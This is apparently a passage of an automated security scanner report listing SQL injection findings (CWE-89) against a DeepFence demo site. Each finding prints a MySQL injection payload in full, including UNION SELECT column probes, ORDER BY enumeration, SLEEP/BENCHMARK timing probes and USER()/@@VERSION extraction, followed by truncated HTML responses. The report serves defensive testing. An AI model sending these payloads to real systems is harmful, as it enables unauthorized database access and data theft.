src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1449\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1450Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''^'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1451\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT USER(),SLEEP(5)-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1452\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1453\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# ORDER BY 20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1454\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# (SELECT * FROM (SELECT(SLEEP(5)))ecMj\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1455\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1456\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \nNULL\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1457\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1458\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1459\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1460\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1461\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1462\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or benchmark(50000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 